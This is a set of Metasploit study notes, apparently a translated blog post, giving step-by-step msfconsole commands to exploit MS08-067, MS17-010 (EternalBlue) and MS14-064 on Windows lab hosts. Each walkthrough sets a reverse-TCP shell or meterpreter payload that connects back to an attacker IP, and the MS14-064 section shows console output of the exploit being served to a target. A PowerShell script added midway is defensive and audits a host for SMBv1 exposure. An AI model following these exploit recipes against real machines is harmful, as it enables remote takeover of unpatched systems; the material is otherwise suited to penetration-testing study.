    Metasploit Study Notes

    0x0 Reproducing the ms08_067 vulnerability

    1. search ms08_067
    2. use exploit/windows/smb/ms08_067_netapi
    3. show payloads
    4. set payload generic/shell_reverse_tcp
    5. show options
    6. show targets
    7. set RHOST 192.168.242.131 (IP of the target machine)
    8. set LPORT 7777 (port the shell connects back to)
    9. set LHOST 192.168.242.129 (IP the shell connects back to)
    10. set target 34 (select the target type)
    11. exploit (launch the attack)

    Alternatively, set the payload to:
    set payload windows/meterpreter/reverse_tcp

    0x01 Reproducing the ms17-010 (EternalBlue) vulnerability

    1. First download the latest exploit module from the internet into the Metasploit framework directory

    Download URL:
    https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

    Destination directory:
    /usr/share/metasploit-framework/modules/exploits/windows/smb/

    Check the exploit's requirements:
    the ruby_smb gem must be installed

    gem install ruby_smb

    2. Start using the module: msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"
    3. From here on the steps are the usual ones (set payload, RHOST, LHOST, then exploit)
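    Both lab modules above (ms08_067_netapi and ms17_010_eternalblue) go through SMB, and in practice through SMBv1 on TCP/445. The following audit script is an added example from the defender's side and is not part of the original notes or of Metasploit: it reports whether the host still exposes SMBv1 and what to change. It assumes Windows 8.1 / Server 2012 R2 or later (SmbShare, DISM and NetTCPIP cmdlets available) and an elevated session.

```powershell
# Added example (not from the original notes): audit a Windows host for the SMBv1
# exposure that the ms08_067 and ms17_010 lab modules rely on.
# Assumes Windows 8.1 / Server 2012 R2+ and an elevated PowerShell session.
function Get-Smb1Exposure {
    [CmdletBinding()]
    param()

    $result = [ordered]@{
        Smb1ServerEnabled = $null
        Smb1FeatureState  = $null
        Port445Listening  = $null
        Recommendation    = @()
    }

    # 1. Is the SMB1 server-side protocol switched on?
    $cfg = Get-SmbServerConfiguration -ErrorAction Stop
    $result.Smb1ServerEnabled = [bool]$cfg.EnableSMB1Protocol

    # 2. Is the optional SMB1Protocol feature installed at all?
    $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
    if ($feature) { $result.Smb1FeatureState = $feature.State.ToString() }

    # 3. Is anything listening on TCP/445 (reachable by the SMB modules)?
    $listener = Get-NetTCPConnection -LocalPort 445 -State Listen -ErrorAction SilentlyContinue
    $result.Port445Listening = [bool]$listener

    if ($result.Smb1ServerEnabled) {
        $result.Recommendation += 'Disable SMB1: Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force'
    }
    if ($result.Smb1FeatureState -eq 'Enabled') {
        $result.Recommendation += 'Remove the feature: Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol'
    }
    if ($result.Port445Listening) {
        $result.Recommendation += 'Restrict TCP/445 at the host firewall to trusted subnets and confirm the MS08-067 / MS17-010 updates are installed'
    }

    [pscustomobject]$result
}

Get-Smb1Exposure | Format-List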

    0x02 Command for finding vulnerabilities for a given platform

    Command: search platform: windows xp sp3

    0x03 Reproducing ms14-064 on Windows 7

    Steps:

    1. service postgresql start
    2. msfconsole
    3. search ms14
    4. use exploit/windows/browser/ms14_064_ole_code_execution
    5. set payload windows/meterpreter/reverse_tcp
    6. set AllowPowershellPrompt true
    7. set LHOST 192.168.242.129
    8. set SRVHOST 192.168.242.129
    9. exploit
    exploit(ms14_064_ole_code_execution) > exploit
    [*] Exploit running as background job.
    
    [*] Started reverse handler on 192.168.242.129:4444 
    [*] Using URL: http://192.168.242.129:8080/oGDKNQK3XUO
    [*] Server started.
    msf exploit(ms14_064_ole_code_execution) > [*] 192.168.242.1    ms14_064_ole_code_execution - Gathering target information.
    [*] 192.168.242.1    ms14_064_ole_code_execution - Sending HTML response.
    [*] 192.168.242.1    ms14_064_ole_code_execution - Sending exploit...
    [*] 192.168.242.1    ms14_064_ole_code_execution - Sending exploit...
    Interrupt: use the 'exit' command to quit
    msf exploit(ms14_064_ole_code_execution) > 
    

    Have the target machine visit: http://192.168.242.129:8080/oGDKNQK3XUO
    and that is all.

    Reproduced successfully, but it gets intercepted by 360 (antivirus)

    Original article: https://www.cnblogs.com/deen-/p/7253048.html